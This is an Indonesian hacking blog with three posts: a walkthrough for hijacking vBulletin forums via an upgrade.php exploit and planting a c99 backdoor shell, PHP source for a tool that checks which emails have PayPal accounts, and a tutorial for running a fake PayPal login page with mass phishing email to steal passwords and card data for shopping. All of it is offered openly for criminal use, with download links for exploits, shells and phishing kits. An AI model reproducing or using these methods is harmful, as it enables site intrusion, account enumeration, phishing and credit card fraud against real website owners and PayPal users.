Saturday, 12 October 2013

Hack vbulletin forum dengan upgrade exploit + upload shell backdoor





Tutor kali ini akan mempraktekkan bagaimana cara exploit website yang beraliran cms vbulletin


ok langsung saja ya

kita butuhkan dork terlebih dahulu

Inurl://install/upgrade.php
intext:vBulletin 4.2.1 Upgrade System
intext:vbulletin-style.xml

copy salah satu dork tersebut lalu tulis di google untuk mencari web site yang rentan akan exploit nya

 setelah itu buka web nya 

lalu masukkan exploitnya 
/install/upgrade.php


misalnya : http://websitetarget.com/install/upgrade.php




kemudian ctrl + U halamanya 
dan anda akan di baa ke halaman source code halaman

dan cari  CUSTNUMBER



setelah mengcopy custnumbernya sekarang download script nya

https://dl.dropboxusercontent.com/s/rmk6y85fr7g11vo/0dayVbulletin-upgrade.php?token_hash=AAGnO5qdtsLUZtvgE87xJo10mNIXjA4gZQbbQBfwTD4w9g&dl=1


setelah download upload script tersebut ke hosting anda

atau bisa gunakan punya saya

http://partisikantor-sms.com/clearbox/language/en/0dayVbulletin-upgrade.php
 setelah itu
copy url korban ,
customer id isi dengan custnumber yang telah di copy tadi ,
username & password & email terserah anda

Lalu kita INJECT


dan sukses



jika berhasil kembali ke website korban dan login ke halaman admin panel nya
http://websitekorban.com/adminpanel

 lalu login dengan username & password yang telah dibuat tadi





dan berhasil sekarang tujuan kita disin adalah memasukkan backdoor php buat hack web tersebut





done . . 

Next, tambahkan url di depan /admincp ditambah /plugin.php?do=files
http://webstarget/admincp/plugin.php?do=files


 Maka anda akan dibawa ke tempat upload shell


sekarang download backdoor shell yang berextensi .xml

download shell --> https://dl.dropboxusercontent.com/s/a3ub3oj8at75zxb/c99.xml.rar?token_hash=AAGfbp-U3BPYVEMzudsOOOpHW4a5eijwfV6yblNpnv6v9w&dl=1

lalu upload/import

Kalo upload nya dah selesai, cek di
http://webtarget.com/admincp/subscriptions.php

dan backdoor pun sudah tertanam pada web


tinggal sekarang terserah mau di deface atau yang lainya
Share:

Tuesday, 8 October 2013

Paypal Valid checker srcipt



langsung aja mau share script buat check email apakan email tersebut akun paypa apa bukan

langsung aja ni source codenya


<?php
@set_time_limit(0);

function curl($url='',$var='',$Follow=False){
    global $set;
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31');
    curl_setopt($curl, CURLOPT_COOKIE,'PP1.txt');
    curl_setopt($curl, CURLOPT_COOKIEFILE,'PP1.txt');
    curl_setopt($curl, CURLOPT_COOKIEJAR,'PP1.txt');
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
    if ($Follow !== False) {
    curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
    }
    $result = curl_exec($curl);
    curl_close($curl);
    return $result;
}
echo "<head>
<style type='text/css'>body{background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwva2HPpTDGnpPwyEICSzYCf576mhTc6kZotW9ibyD1iqiC8DjfXSrlHd-zpd3IUETCkwTiqUOS7jn-ExC0k5SbTOIZkWAUf0oy8-eArCcBVpGsAqpfgtD7clEixbt4N53m1YcH4lIPHPA/s1600/hacker-creates-worldwide-map-of-vulnerable-devices.png)</style>

</style>
<title>Valid Email Checker</title>
</head><div align=\"center\"></center>";

$emails = $_POST['emails'];
print '<div id="form-container"> <form method="POST">

<p align="center"><font face="Times New Roman" size="6" color="ffffff">
TrojanzBoy<br>Paypal Checker</font></p>

    <p><textarea rows="10" name="emails" cols="48">'.$emails.'</textarea></p>
    <p><input class="submit-button" type="submit" value="Submit" name="B1"></p>
</form> </div>';
if (!empty($emails)) {
$emails = explode("\r\n", $emails);
$yes = 0;
$not = 0;
$inv = 0;
$count = 1;
print "<p align=\"left\"><font color=\"#ffffff\">Checking  <b>".count($emails)."</b> emails ....</font><br></p><p align=\"left\">";
foreach ( $emails as $email ) {
    $email = trim($email);
     print "<font color=\"#ffffff\"> $count .. Checking <b>".$email." ..... </font> </b>";
    $count++;
    if(filter_var($email, FILTER_VALIDATE_EMAIL)){
$_CheckAction = curl('https://www.paypal.com/cgi-bin/webscr?cmd=_send-money&myAllTextSubmitID=&cmd=_send-money&type=external&payment_source=p2p_mktgpage&payment_type=Gift&sender_email='.$email.'&email=gz%40s.com&currency=USD&amount=10&amount_ccode=USD&submit.x=Continue',CURLOPT_FAILONERROR,TRUE);
            if(!strpos($_CheckAction, "region")) {
                print "<font size=\"3\" color=\"#006600\">Yes</font> <br>";
                $yes++;
                $vaild_yes .=$email."\n";
            }
        else {
            print "<font color=\"#FF0000\">NO</font><br>";
            $not++;
            $vaild_no .=$email."\n";
        }
    }
    else {
        print "<font color=\"#FF0000\">Invaild email</font><br>";
        $inv++;
        $invaild .=$email."\n";
}
}

print '<p><table border="0" width="100%">
   



         <tr>
        <td><p align="center"><font face="Times New Roman" size="4"><font color="#006600">PayPal emails</font> <b>(<font color="#006600"><b>'.$yes.'</b></font>)</b> </p></td>
        <td><p align="center"><font face="Times New Roman" size="4"><font color="#FF0000">Not PayPal emails</font> <b>(<font color="#FF0000">'.$not.'</font>)</b> </p> </td>
        <td><p align="center"><font face="Times New Roman" size="4"><font color="#FF0000">Invalid emails</font> <b>(<font color="#FF0000">'.$inv.'</font>)</b> </p> </td>
</tr>

    <tr>

   
   
   
          <td><div id="form-container1"><textarea rows="10" name="S1" cols="43">'.$vaild_yes.'</textarea></div></td>
        <td><div id="form-container1"><textarea rows="10" name="S2" cols="43">'.$vaild_no.'</textarea></div></td>
        <td><div id="form-container1"><textarea rows="10" name="S3" cols="43">'.$invaild.'</textarea></div></td>
    </tr>
</table></p>';
}

?><p>&nbsp;</p>
     


buka dengan txt dan simpan dengan extensi .php


thanks
Share:

Saturday, 5 October 2013

Hack paypal dengan fitur baru

Jika kita sering berkelana di dunia maya alias internet pasti setidaknya pernah melihat logo gambar di atas, yup itu adalah logo PayPal. Mungkin beberapa dari kita pernah terbesit pikiran apa itu paypal? Jika ditelusur di situs resminya yaitu PayPal.com, PayPal adalah cara yang lebih aman dan lebih mudah untuk membayar dan dibayar secara online. Layanan ini memungkinkan setiap orang untuk membayar dengan cara sesuai kehendak kita, termasuk melalui kartu kredit, rekening bank, kredit pembeli atau saldo rekening, tanpa memberitahukan informasi keuangan kita.
Apabila diibaratkan, rekening PayPal itu mirip dengan rekening bank online, tapi rekening bank online terbatas hanya berlaku di satu negara. Contoh simple’nya, kita tidak bisa membeli barang/jasa di situs luar negeri seperti eBay.com, godaddy.com, amazon.com dan lain-lain. Dan juga apabila kamu pengguna BlackBerry ataupun iPhone/iPad, kamu tidak bisa membeli aplikasi dan game pada App Wolrd ataupun App Store dengan rekening Bank, namun jika kamu memiliki akun PayPal maka kamu bisa membeli aplikasi tersebut.
Pada intinya jika kamu suka berbelanja online, PayPal akan memudahkan kamu dalam hal pembayaran, karena saat ini sudah ada jutaan pedagang/toko online di seluruh dunia yang menerima pembayaran online dengan PayPal. Apalagi jika kamu pedagang/toko online, sudah wajib hukumnya membuat akun PayPal untuk mempermudah orang dari negara lain melakukan pembayaran.

ok langsung aja

pertama download script login paypal + full fitur dan info di -->https://dl.dropboxusercontent.com/s/hjlapnolhvyuxi8/paypal.zip?token_hash=AAHgew8nchp3_soGoxdSCmvZe4Jv_evQDKTjRqNQE01f1Q&dl=1
fitur yang dimiliki script ini kita akan mendapatkan info CC , CVV  dan email korban

Email address : xxxxxxxxxxx@domain.com
PayPal Password : xxxxxxxxxxx
Card Type : Visa
Card Number :
Expiration Date :
Card Verification Number :
Password o SecureCode :
-------------------------------------
first name :
last name :
Address 1 :
DOB :
Date :
City :
State :
ZIP Code :
Telephone :
-------------------------------------

dan upload script login paypal ke hosting anda

lalu unzip script yang di download tadi



buka file TrojanzBoy.php dan rubah email nya menjadi email kalian







dan buka file process.php rubah email menjadi email kalian



 lalu

sekarang download dulu script email nya -->  https://dl.dropboxusercontent.com/s/xj7dhewsrt2vgiv/massmail.php?token_hash=AAG8N4JXllWcbWVMsXjGeE1gg-4Q4bU4Oib0foMbh94ExA&dl=1

setelah itu upload ke hosting kalian

lalu buka scriptnya


lalu buat email yang sekiranya korban bisa percaya bahwa email tersebut beneran dari paypal




 setelah itu kirim email dan korban pun membuka email

dan isinya email yang seolah - olah dari paypal



dan jika korban membuka isinya maka akan dialihkan ke link login paypal palsu

tampilan awal loginya




setelah sukses login



dan halamin security measures pun juga ada beserta info credit cardnya



dan hasil loging  akan terkirim ke email kita



dan credit card pun siap untuk kita gunakan belanja
Share:

Blogroll

This Blog is protected by DMCA.com

Labels